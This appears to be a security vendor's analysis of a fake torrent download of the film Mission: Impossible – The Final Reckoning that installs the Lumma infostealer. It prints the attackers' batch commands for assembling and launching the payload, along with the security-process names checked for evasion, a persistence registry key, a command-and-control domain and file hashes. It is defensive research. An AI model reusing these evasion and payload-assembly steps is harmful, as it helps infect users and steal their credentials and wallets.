Fake Download of Mission: Impossible – The Final Reckoning Movie Deploys Lumma Stealer

Mission: Impossible – The Final Reckoning is now in theaters, and many of the publicly available peer-to-peer sharing websites are already offering the movie as a download. Public interest in such a blockbuster gives cyberattackers a way to serve dangerous malware through unorthodox means.

Downloading movies from torrent websites is illegal, but people still do it. Many of these indexers offer real TV shows and films, so it's very easy for attackers to slip in malware, especially under the guise of a blockbuster movie everyone wants to see.

Key Findings:

Cybercriminals are using torrent websites to spread a very powerful malware named Lumma stealer.

• Victims are tricked into believing they downloaded a real movie or TV show. In this particular case, it's the yet-unreleased blockbuster Mission: Impossible – The Final Reckoning.
• The malware tries to remain hidden from security solutions
• Before deploying Lumma stealer, criminals also used AutoIt to automate various scripts
• After installation, the malware will download passwords, cookies, crypto wallet, credentials from remote desktop tools, and much more

Mission: Impossible – The Final Reckoning is not the only big name attackers use to push this malware. In fact, indexers have become fertile ground for all kinds of info stealers, especially in the past year. For example, whenever a TV show becomes very popular, new episodes that are, in fact, malware will become available for download a few days before the actual episode even airs.

Opening the file is enough

When a user downloads something that looks like a video file, the attackers try to hide their intentions. They will sometimes use an extension like ".mkv.lnk" or similar. In this case, they use a file with the ".arj" extension.

ARJ is an archaic type of archive that's been around for more than 30 years, but it's hardly used today. This is important because there's a good chance users won't recognize the file format.

On the other hand, file archivers like 7-Zip or WinRAR will recognize and open the ARJ file format. Inside, the attackers are offering a self-extracting archive with the .EXE extension.

The file is presented as Mission.Impossible.The.Final Reckoning.2025.1080p.WEB-DL.DDP5.1.x265-NeoNoir.arj

It's disguised as a standard video file. However, after extraction, it reveals multiple files, most notably a self-extracting executable named Mission.Impossible.The.Final.Reckoning.2025.1080p.WEB-DL.DDP5.1.x265-NeoNoir.exe

The execution chain breakdown is very interesting. Bitdefender researcher Victor Vrabie took the malware apart, bypassed the numerous obfuscation techniques and revealed how users’ devices gets infected.

Initial execution:

When the user runs the file, the executable initiates a batch script, Mary.eps.bat, that performs a complex sequence of actions.

Batch script operations:

Sets misleading environment variables, such as:

• Set ONFSgeGlzGmusxkYLLOXThHcOrPOzFzejrjgqPc=Extraordinary[.]com
• Set dTeVBjCFnZHCa=5

Checks for running processes that belong to known security solutions (opssvc, wrsa, bdservicehost, SophosHealth, AvastUI, AVGUI, nsWscSvc, ekrn).

Introduces a deliberate delay (ping -n 209 127.0.0.1) if security processes are detected.

Payload assembly:

Creates a temporary directory named %Delicious% (numeric value set to 592984).

Uses tools such as 'extrac32' to extract embedded resources (Experiments.eps).

Constructs a malicious binary (Extraordinary[.]com) through concatenation:

set /p ="MZ" > %Delicious%\Extraordinary[.]com <nul
findstr /V "RESPECTIVE" Centre >> %Delicious%\Extraordinary[.]com
copy /b %Delicious%\Extraordinary[.]com + Slots + All + Is + Cached + Drums + Animals + Canadian + Understand + Beneficial + Research + Briefs %Delicious%\Extraordinary[.]com

AutoIt script execution:

Combines additional encrypted payload components (Ties.eps, Encounter.eps, etc.) into a final AutoIt executable (t.a3x):

cmd /c copy /b ..\Ties.eps + ..\Encounter.eps + ..\Describe.eps + ..\Tracked.eps + ..\Rover.eps + ..\Distinguished.eps + ..\Indexes.eps t.a3x
start Extraordinary[.]com t.a3x

It's worth noting that AutoIt scripting language is used to automate actions within the Windows GUI and perform various scripting tasks. It has legitimate uses, which is why criminals employ it, thinking it has a greater chance of bypassing security checks, which facilitates the malware's persistence.

Cybercriminals frequently abuse AutoIt because it is straightforward to write and compile into executables (.exe), which simplifies malware distribution.

RC4 encryption, shellcode Injection, and anti-analysis

• The AutoIt script (MD5: 1525cb22bf5ce9b7b2defbb7be0bddbd) injects and executes shellcode to decrypt embedded binary data using RC4 encryption.
• Shellcode dynamically resolves APIs via the Process Environment Block (PEB), which tends to complicate detection.
• Payload extraction monitored via Windows API calls (RtlDecompressFragment) eventually yields Lumma Stealer (MD5: fad0463794762de0bde1396c73811e7e).
• Includes sandbox detection techniques, checking specific hostnames, usernames, and files (C:\aaa_TouchMeNot_.txt).

Lumma stealer is one of the more popular info stealers at the moment, especially since it's available via Darknet for anyone to buy. The version used in this movie download was compiled very recently, meaning it’s likely one of the latest versions. The malware has a number of features that make it very dangerous and capable of extracting a huge amount of sensitive data.

• Performs data harvesting from browsers (credentials, cookies, autofill information).
• Targets cryptocurrency wallets (MetaMask, Binance, and many others).
• Can collect credentials from remote desktop tools.
• Makes persistent registry entries (HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).
• Exfiltrates data through encrypted HTTP/HTTPS POST to command-and-control servers (pricegxzm.run, among others).
• It uses memory injection and process hollowing techniques that helps it in its efforts to evade detection.

Lamma stealer is clearly used extensively by criminals to infect people who download movies and tv shows from shady sources, but it's not the only place it can be found. It's also present in all kinds of downloads for fake game trainers, cracked software, and many others.

In fact, there's always a chance people will download malware, especially if the source of the download is illegal and if the item they're searching for is very popular, like the latest Mission Impossible movie.

Fortunately, an international effort has already hit the Lumma stealer infrastructure, and at least for now, the malware has been severely affected. Users must also be aware that Lumma stealer is not the only malware criminals use via torrents and by utilizing known TV shows and movies.